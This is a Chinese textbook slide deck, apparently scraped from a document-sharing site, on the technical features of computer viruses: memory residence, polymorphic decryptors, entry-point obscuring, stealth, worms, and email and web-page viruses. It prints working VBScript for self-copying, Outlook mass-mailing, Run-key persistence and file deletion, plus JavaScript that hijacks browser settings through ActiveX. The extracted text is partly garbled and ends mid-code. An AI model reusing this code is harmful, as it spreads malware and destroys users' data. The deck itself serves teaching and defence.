《計(jì)算機(jī)病毒及其防范技術(shù)》第四章計(jì)算機(jī)病毒技術(shù)特征

上傳人：于*** IP屬地：遼寧上傳時(shí)間：2024-05-15 格式：PPT 頁數(shù)：66 大?。?88.50KB 積分：12 舉報(bào) 版權(quán)申訴

《計(jì)算機(jī)病毒及其防范技術(shù)》第四章計(jì)算機(jī)病毒技術(shù)特征_第2頁

《計(jì)算機(jī)病毒及其防范技術(shù)》第四章計(jì)算機(jī)病毒技術(shù)特征_第3頁

《計(jì)算機(jī)病毒及其防范技術(shù)》第四章計(jì)算機(jī)病毒技術(shù)特征_第4頁

《計(jì)算機(jī)病毒及其防范技術(shù)》第四章計(jì)算機(jī)病毒技術(shù)特征_第5頁

已閱讀5頁，還剩61頁未讀，繼續(xù)免費(fèi)閱讀

版權(quán)說明：本文檔由用戶提供并上傳，收益歸屬內(nèi)容提供方，若內(nèi)容存在侵權(quán)，請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

第四章計(jì)算機(jī)病毒技術(shù)特征一、常見計(jì)算機(jī)病毒的技術(shù)特征

駐留內(nèi)存病毒變種EPO（EntryPointObscuring）技術(shù)抗分析技術(shù)（加密、反跟蹤）隱蔽性病毒技術(shù)多態(tài)性病毒技術(shù)

插入型病毒技術(shù)超級(jí)病毒技術(shù)破壞性感染技術(shù)病毒自動(dòng)生產(chǎn)技術(shù)網(wǎng)絡(luò)病毒技術(shù)1駐留內(nèi)存:DOSTSRDOS系統(tǒng)區(qū)內(nèi)存控制塊（MCB）內(nèi)存塊1為病毒分配的內(nèi)存塊內(nèi)存塊2為病毒分配一塊內(nèi)存高端內(nèi)存區(qū)域視頻內(nèi)存塊中斷向量表空閑區(qū)域病毒代碼空閑區(qū)域空閑區(qū)域空閑區(qū)域DOS病毒駐留內(nèi)存位置示意圖1駐留內(nèi)存：引導(dǎo)區(qū)病毒的內(nèi)存駐留

大小在1K或者幾K為了避免用戶可以很容易的覺察到系統(tǒng)可用內(nèi)存的減少，一些病毒會(huì)等待DOS完全啟動(dòng)成功，然后使用DOS自己的功能分配內(nèi)存。1駐留內(nèi)存：Windows環(huán)境下病毒的內(nèi)存駐留三種駐留內(nèi)存的方法由于Windows操作系統(tǒng)本身就是多任務(wù)的，所以最簡(jiǎn)單的內(nèi)存駐留方法是將病毒作為一個(gè)應(yīng)用程序，病毒擁有自己的窗口（可能是隱藏的）、擁有自己的消息處理函數(shù)；另外一種方法是使用DPMI申請(qǐng)一塊系統(tǒng)內(nèi)存，然后將病毒代碼放到這塊內(nèi)存中；第三種方法是將病毒作為一個(gè)VXD（Win3.x或者Win9x環(huán)境下的設(shè)備驅(qū)動(dòng)程序）或者在WinNT／Win2000下的設(shè)備驅(qū)動(dòng)程序WDM加載到內(nèi)存中運(yùn)行。防止重載的方法傳統(tǒng)的防止重入方法禁止啟動(dòng)兩個(gè)實(shí)例對(duì)于VXD病毒靜態(tài)加載時(shí)，病毒會(huì)在“SYSTEM.INI”文件中包含加載設(shè)備驅(qū)動(dòng)程序的一行信息；動(dòng)態(tài)加載時(shí)，可能使用某些英特爾CPU的一些特殊狀態(tài)位來表示病毒是否存在于內(nèi)存中（CIH病毒就采用了這種方法）。1駐留內(nèi)存：宏病毒的內(nèi)存駐留方法病毒隨著宿主程序而被加載并且一直存在于系統(tǒng)中，所以從某種意義上，宏病毒都是內(nèi)存駐留病毒。宏病毒通過檢測(cè)自己的特征防止重入。2病毒變種變形變種——〉新品種兩種方式：手工變種自動(dòng)變種（MutationEngine：變形機(jī)）保加利亞的DarkAvenger的變形機(jī)最著名。分類第一類，具備普通病毒所具有的基本特性，然而，病毒每感染一個(gè)目標(biāo)后，其自身代碼與前一被感染目標(biāo)中的病毒代碼幾乎沒有三個(gè)連續(xù)的字節(jié)是相同的，但這些代碼及其相對(duì)空間的排列位置是不變動(dòng)的。這里稱其為一維變形病毒。第二類，除了具備一維變形病毒的特性外，并且那些變化的代碼相互間的排列距離（相對(duì)空間位置）也是變化的，有的感染文件的字節(jié)數(shù)不定。這里稱其為二維變形病毒。第三類，具備二維變形病毒的特性，并且能分裂后分別潛藏在幾處，隨便某一處的子病毒被激發(fā)后都能自我恢復(fù)成一個(gè)完整的病毒。病毒在附著體上的空間位置是變化的，即潛藏的位置不定。例如，在某臺(tái)機(jī)器中，病毒的一部分可能藏在機(jī)器硬盤的主引導(dǎo)區(qū)中，另外幾部分也可能潛藏在可執(zhí)行文件中，也可能潛藏在覆蓋文件中，也可能潛藏在系統(tǒng)引導(dǎo)區(qū)，也可能另開墾一塊區(qū)域潛藏等等。在另一臺(tái)被感染的機(jī)器內(nèi)，病毒可能又改變了其潛藏的位置。這里稱其為三維變形病毒。第四類，具備三維變形病毒的特性，并且，這些特性隨時(shí)間動(dòng)態(tài)變化。例如，在染毒的機(jī)器中，剛開機(jī)時(shí)病毒在內(nèi)存里變化為一個(gè)樣子，一段時(shí)間后又變成了另一個(gè)樣子，再次開機(jī)后病毒在內(nèi)存里又是一個(gè)不同的樣子。這里稱其為四維變形病毒。3EPO（EntryPointObscuring）技術(shù)為什么要采用EPO技術(shù)呢？殺毒技術(shù)提高〉防止被發(fā)現(xiàn)〉EPO三種實(shí)現(xiàn)方法：最早的EPO通過改變程序入口處的代碼實(shí)現(xiàn)的。簡(jiǎn)單但無用把宿主程序的任意位置的指令替換為跳轉(zhuǎn)語句。難點(diǎn)在于定位一個(gè)完整的指令（類似于一個(gè)反編譯器）PATCHIAT的函數(shù)。如果在一段代碼中有一條指令：call

[7d100febh]

把它替換成新的指令Call[Addressofvirus]

在病毒體內(nèi)還要再次調(diào)用Call[7d100febh]來完成宿主程序的功能。在病毒代碼中，返回前代碼改為Call[7d100febh]指令。4抗分析技術(shù)加密技術(shù)：這是一種防止靜態(tài)分析的技術(shù)，使得分析者無法在不執(zhí)行病毒的情況下，閱讀加密過的病毒程序。反跟蹤技術(shù)：使得分析者無法動(dòng)態(tài)跟蹤病毒程序的運(yùn)行。Win95.Flagger病毒4抗分析技術(shù)：自加密技術(shù)數(shù)據(jù)加密（信息加密）例如：6.4計(jì)算機(jī)病毒就是這樣處理的，計(jì)算機(jī)病毒發(fā)作時(shí)將在屏幕上顯示的字符串被用異或操作的方式加密存儲(chǔ)。1575病毒加密數(shù)據(jù)文件。加密文件名COMMAND.COM病毒代碼加密ChineseBomb把宿主程序前6個(gè)字節(jié)加密并轉(zhuǎn)移位置。1701/1704用宿主程序的長(zhǎng)度作為密鑰加密代碼。4抗分析技術(shù)：反跟蹤技術(shù)DOS下，修改int0-3中斷Windows下：封鎖鍵盤輸入關(guān)閉屏幕顯示修改堆棧指令程序運(yùn)行計(jì)時(shí)動(dòng)態(tài)地生成指令代碼5隱蔽性病毒技術(shù)引導(dǎo)型隱藏方法一感染時(shí)，修改中斷服務(wù)程序使用時(shí)，截獲INT13調(diào)用DOS應(yīng)用程序原來的INT13H服務(wù)程序DOS下的殺毒軟件病毒感染后的INT13H服務(wù)程序普通扇區(qū)普通扇區(qū)被病毒感染的扇區(qū)被病毒感染的扇區(qū)的原始扇區(qū)讀扇區(qū)調(diào)用讀請(qǐng)求讀請(qǐng)求返回?cái)?shù)據(jù)返回?cái)?shù)據(jù)返回?cái)?shù)據(jù)引導(dǎo)型隱藏方法二針對(duì)殺毒軟件對(duì)磁盤直接讀寫的特點(diǎn)。截獲INT21H，然后恢復(fù)感染區(qū)最后，再進(jìn)行感染DOS命令解釋程序（COMMAND..COM）感染后的INT21H功能40H（加載一個(gè)程序執(zhí)行）用戶敲入AV.EXE執(zhí)行反病毒程序恢復(fù)被病毒感染的扇區(qū)為原來的內(nèi)容原來的INT21H功能重新感染扇區(qū)返回DOS命令解釋程序（COMMAND..COM）文件型病毒的隱藏技術(shù)攔截（API,INT調(diào)用）訪問——〉恢復(fù)——〉再感染。例如，改變文件大小病毒，dir病毒等DOSINT21H調(diào)用INT13H（直接磁盤訪問）列目錄功能（FindFirst、FindNext）讀寫功能（Read、Write）執(zhí)行功能（EXEC）其他功能（rename等）視窗操作系統(tǒng)下，支持長(zhǎng)文件名的擴(kuò)展DOS調(diào)用隱藏病毒扇區(qū)列目錄時(shí)顯示感染前的文件大小讀寫文件看到正常的文件內(nèi)容執(zhí)行或者搜索時(shí)隱藏病毒在支持長(zhǎng)文件名的系統(tǒng)隱藏自身宏病毒的隱藏技術(shù)刪除相關(guān)的菜單項(xiàng)：“文件－>模板”或者“工具－>宏”使用宏病毒自己的FileTemplates和ToolsMacro宏替代系統(tǒng)缺省的宏6多態(tài)性病毒技術(shù)多態(tài)病毒就是沒有特殊特征碼的病毒，這種病毒無法（或極難）用特征碼掃描法檢測(cè)到。方法：使用不固定的密鑰或者隨機(jī)數(shù)加密病毒代碼運(yùn)行的過程中改變病毒代碼通過一些奇怪的指令序列實(shí)現(xiàn)多態(tài)性BASIC，Shell等解釋性語言可以在一行包括很多語句。使用加密技術(shù)的多態(tài)性MOVreg_1,countMOVreg_2,keyMOVreg_3,offsetLOOP：xxxbyteptr[reg_3]，reg_2DECreg_1JxxLOOP其中，reg_1、reg_2和reg_3是從AX、BX、CX、DX、SI、DI、BP中隨機(jī)挑選的寄存器，感染不同的文件，解密代碼使用隨機(jī)的寄存器count是加密數(shù)據(jù)的長(zhǎng)度，key是加密的密鑰，offset是加密代碼的偏移量，感染的時(shí)候，這些數(shù)值都是隨機(jī)生成的，不同的感染都不一樣xxx是XOR、ADD、SUB等不同運(yùn)算指令的通稱，使用什么運(yùn)算指令是感染的時(shí)候隨機(jī)選擇的Jxx是ja、jnc等不同條件跳轉(zhuǎn)指令的通稱，使用什么跳轉(zhuǎn)指令也是感染的時(shí)候隨機(jī)選擇的加密后的病毒代碼改變可執(zhí)行代碼技術(shù)的多態(tài)病毒基本上都使用在宏病毒中，其他病毒少見。宏語言都是以BASIC為基礎(chǔ)的。引導(dǎo)型病毒在引導(dǎo)區(qū)或者分區(qū)表中，包含了一小段代碼來加載實(shí)際的病毒代碼，這段代碼在運(yùn)行的過程中是可以改變的。文件型病毒“厚度”（Ply）病毒“TMC”病毒多態(tài)病毒的級(jí)別半多態(tài)：病毒擁有一組解密算法，感染的時(shí)候從中間隨機(jī)的選擇一種算法進(jìn)行加密和感染。具有不動(dòng)點(diǎn)的多態(tài)：病毒有一條或者幾條語句是不變的（我們把這些不變的語句叫做不動(dòng)點(diǎn)），其他病毒指令都是可變的。帶有填充物的多態(tài)：解密代碼中包含一些沒有實(shí)際用途的代碼來干擾分析者的視線。算法固定的多態(tài)：解密代碼所使用的算法是固定的，但是實(shí)現(xiàn)這個(gè)算法的指令和指令的次序是可變的。算法可變的多態(tài)：使用了上述所有的技術(shù)，同時(shí)解密算法也是可以部分或者全部改變的。完全多態(tài)：算法多態(tài)，同時(shí)病毒體可以隨機(jī)的分布在感染文件的各個(gè)位置，但是在運(yùn)行的時(shí)候能夠進(jìn)行拼裝，并且可以正常工作。查殺技術(shù)對(duì)于前面3種多態(tài)病毒，可以使用病毒特征碼或者改進(jìn)后的病毒特征碼對(duì)于第4種多態(tài)病毒，可以增加多種情況的改進(jìn)后的特征碼至于第5和第6種多態(tài)病毒，依靠傳統(tǒng)的特征碼技術(shù)是完全無能為力的。最好的辦法是虛擬執(zhí)行技術(shù)。7插入型病毒技術(shù)DOS下較少PE病毒大多數(shù)都是插入型病毒例如，CIH8超級(jí)病毒技術(shù)超級(jí)病毒技術(shù)就是在計(jì)算機(jī)病毒進(jìn)行感染、破壞時(shí)，使得病毒預(yù)防工具無法獲得運(yùn)行機(jī)會(huì)的病毒技術(shù)。技術(shù)較難實(shí)現(xiàn)。和殺毒技術(shù)相比，具有時(shí)效性。9破壞性感染技術(shù)破壞性感染病毒是針對(duì)計(jì)算機(jī)病毒消除技術(shù)的一項(xiàng)病毒技術(shù)。實(shí)例：Burge病毒是這類病毒的典型代表，該病毒會(huì)使宿主文件頭部丟失560字節(jié)；Hahaha病毒會(huì)使宿主程序丟失13592字節(jié)。傳播性差--〉破壞面小在潛伏期長(zhǎng)的情況下，其傳播性可以有所改觀。10病毒自動(dòng)生產(chǎn)技術(shù)針對(duì)病毒分析的技術(shù)兩種類型：根據(jù)簡(jiǎn)單的操作，自動(dòng)生成病毒（PE,宏病毒等）用自動(dòng)生成技術(shù)實(shí)現(xiàn)變種（MutationEngine）11網(wǎng)絡(luò)病毒技術(shù)網(wǎng)絡(luò)病毒是指以網(wǎng)絡(luò)為平臺(tái)，對(duì)計(jì)算機(jī)產(chǎn)生安全威脅的所有程序的總和.常見的幾種：木馬病毒（Trojan）蠕蟲病毒（Worm）

郵件病毒網(wǎng)頁病毒二、流行病毒的關(guān)鍵技術(shù)

蠕蟲病毒利用Outlook漏洞編寫病毒W(wǎng)ebpage中的惡意代碼流氓軟件1蠕蟲病毒蠕蟲這個(gè)名詞的由來是在1982年，Shock和Hupp根據(jù)《TheShockwaveRider》一書中的概念提出了一種“蠕蟲（Worm）”程序的思想。蠕蟲（Worm）是病毒的一種，它的傳播通常不需要所謂的激活。它通過分布式網(wǎng)絡(luò)來散播特定的信息或錯(cuò)誤，進(jìn)而造成網(wǎng)絡(luò)服務(wù)遭到拒絕并發(fā)生死鎖。具有病毒共性：如傳播性、隱蔽性、破壞性等獨(dú)有的性質(zhì)：不利用文件寄生，對(duì)網(wǎng)絡(luò)造成拒絕服務(wù)，以及和黑客技術(shù)相結(jié)合等等兩類：一種是面向企業(yè)用戶和局域網(wǎng)而言，這種病毒利用系統(tǒng)漏洞，主動(dòng)進(jìn)行攻擊，可以對(duì)整個(gè)互聯(lián)網(wǎng)可造成癱瘓性的后果。以“紅色代碼”、“尼姆達(dá)”以及最新的“SQL蠕蟲王”為代表。另外一種是針對(duì)個(gè)人用戶的，通過網(wǎng)絡(luò)（主要是電子郵件、惡意網(wǎng)頁形式）迅速傳播的蠕蟲病毒，以愛蟲病毒、求職信病毒為代表。和普通病毒的區(qū)別：普通病毒蠕蟲病毒存在形式寄存文件獨(dú)立程序傳染機(jī)制宿主程序運(yùn)行主動(dòng)攻擊傳染目標(biāo)本地文件網(wǎng)絡(luò)計(jì)算機(jī)蠕蟲病毒的特性第一，利用漏洞主動(dòng)進(jìn)行攻擊第二，病毒制作技術(shù)新第三，與黑客技術(shù)相結(jié)合，潛在的威脅和損失更大第四，傳染方式多第五，傳播速度快第六，清除難度大第七，破壞性強(qiáng)蠕蟲病毒的機(jī)理蠕蟲病毒由兩部分組成：一個(gè)主程序和另一個(gè)是引導(dǎo)程序。主程序收集與當(dāng)前機(jī)器聯(lián)網(wǎng)的其他機(jī)器的信息。利用漏洞在遠(yuǎn)程機(jī)上建立引導(dǎo)程序。引導(dǎo)程序把“蠕蟲”病毒帶入了它所感染的每一臺(tái)機(jī)器中。當(dāng)前流行的病毒主要采用一些已公開漏洞、腳本、電子郵件等機(jī)制進(jìn)行傳播。例如，IRC,RPC等漏洞。如何防范蠕蟲預(yù)防第一工具保護(hù)定期掃描你的系統(tǒng)更新你的防病毒軟件不要輕易執(zhí)行附件中的EXE和COM等可執(zhí)行程序不要輕易打開附件中的文檔文件不要直接運(yùn)行附件郵件程序設(shè)置謹(jǐn)用預(yù)覽功能卸載ScriptingHost警惕發(fā)送出去的郵件2利用Outlook漏洞編寫病毒

電子郵件成為新型病毒的重要載體利用Outlook漏洞傳播的病毒：“愛蟲（ILoveYou）”“美麗殺（Melissa）”宏病毒“庫(kù)爾尼科娃”“主頁(HomePage)”“歡樂時(shí)光（HappyTime）”郵件病毒分類附件方式：病毒的主要部分就隱藏在附件中?！爸黜?HomePage)”和“愛蟲（ILoveYou）”病毒，它們的附件是VBS文件，也就是病毒關(guān)鍵部分。郵件本身：病毒并不置身于附件，而是藏身于郵件體之中。“歡樂時(shí)光（HappyTime）”病毒就是藏身于郵件體中，一旦用戶將鼠標(biāo)移至帶毒郵件上，還未閱讀郵件就已經(jīng)中毒了。嵌入方式：病毒僅僅把電子郵件作為其傳播手段?！懊利悮ⅲ∕elissa）”是一種隱蔽性、傳播性極大的Word97/2K宏病毒。盡管其核心內(nèi)容是宏病毒，但在病毒體內(nèi)有一塊代碼專門用來傳播。當(dāng)條件符合時(shí)，打開用戶的電子郵件地址，向前50個(gè)地址發(fā)送被感染的郵件。電子郵件型病毒的傳播原理自我復(fù)制Setfso=CreateObject("Scripting.FileSystemObject")fso.GetFile(WScript.ScriptFullName).Copy("C:\temp.vbs")這么兩行代碼就可以將自身復(fù)制到c盤根目錄下temp.vbs這個(gè)文件。傳播——電子郵件病毒是通過電子郵件傳播的。Setola=CreateObject("Outlook.Application")OnErrorResumeNextForx=1To50SetMail=ola.CreateItem(0)Mail.to=ola.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)Mail.Subject="BetreffderE-Mail"Mail.Body="TextderE-Mail"Mail.Attachments.Add("C:\temp.vbs")Mail.SendNextola.Quit‘調(diào)整腳本語言的超時(shí)設(shè)置。

dimwscr,rr

setwscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout")

if(rr>=1)then

wscr.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout",0,"REG_DWORD"

endif

’修改注冊(cè)表，使得每次系統(tǒng)啟動(dòng)時(shí)自動(dòng)執(zhí)行腳本

regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"

regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"‘MSKernel32.vbs和Win32DLL.vbs是病毒腳本的一個(gè)副本破壞性語句打開磁盤格式化窗口Setobj=Wscript.CreateObject(“Wscript.Shell”)Obj.Run“rundll32.exeshell32.dll,SHFormatDrive”打開Windows關(guān)閉窗口Setobj=Wscript.CreateObject(“Wscript.Application”)Obj.ShutdownWindows刪除當(dāng)前目錄中所有的.exe文件Setobj=Wscript.CreateObject(“Wscript.Shell”)Obj.Run(“C/CDEL*.EXE,0,False”)寫注冊(cè)表(寫入字符串“TestValue”)Setobj=Wscript.CreateObject(“Wscript.Shell”)Obj.RegWrite“HKey_Local_Machine\Software\Microsoft”,“TestValue”電子郵件型病毒預(yù)防第一，不要輕易打開陌生人來信中的附件文件。第二，對(duì)于比較熟悉的朋友們寄來的信件，也要注意其附件。第三，切忌盲目轉(zhuǎn)發(fā)。第四，去掉Windows腳本執(zhí)行功能，禁止VBS文件執(zhí)行。第五，不要隱藏系統(tǒng)中已知文件類型的擴(kuò)展名稱。第六，將系統(tǒng)的網(wǎng)絡(luò)連接的安全級(jí)別設(shè)置至少為“中等”.第七，利用工具。4Webpage中的惡意代碼WebPage中的惡意代碼主要是指某些網(wǎng)站使用的惡意代碼。這些代碼打著是給用戶加深“印象”、提供“方便”的旗號(hào)做令人厭惡的事情?！叭f花谷”病毒腳本病毒基本類型第一，基于JAVAScript的腳本病毒第二，基于VBScript的腳本病毒可以在Office，瀏覽器、Outlook中運(yùn)行,危害性較大。第三，基于PHP的腳本病毒第四，腳本語言和木馬程序結(jié)合的病毒病毒的工作機(jī)理病毒利用了下面這段JavaScript代碼修改了HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\和HKCU\Software\Microsoft\InternetExplorer\Main\中的WindowTitle這個(gè)鍵的值。同時(shí)，病毒還修改了用戶的許多IE設(shè)置，如消除運(yùn)行（RUN）按鈕、消除關(guān)閉按鈕、消除注銷按鈕、隱藏桌面、隱藏盤符、禁止注冊(cè)表等。以下就是這個(gè)病毒的代碼：document.write("");//該函數(shù)是現(xiàn)在收藏夾里增加一個(gè)站點(diǎn)

functionAddFavLnk(loc,DispName,SiteURL)

{

varShor=Shl.CreateShortcut(loc+"\\"+DispName+".URL");

Shor.TargetPath=SiteURL;

Shor.Save();

}//該函數(shù)是病毒的主函數(shù)，實(shí)現(xiàn)COOKIES檢查、注冊(cè)表修改等

functionf(){

try

{//聲明一個(gè)ActiveX對(duì)象

ActiveXinitialization

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

//創(chuàng)建幾個(gè)實(shí)例a1.createInstance();

Shl=a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO=a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net=a1.GetObject();try

{

if(documents.cookies.indexOf("Chg")==-1)

{//設(shè)置IE起始頁

Shl.RegWrite("HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\StartPage",

"/");//設(shè)置COOKIES

varexpdate=newDate((newDate()).getTime()+(1));

documents.cookies="Chg=general;expires="+expdate.toGMTString()+";path=/;"http://消除RUN按鈕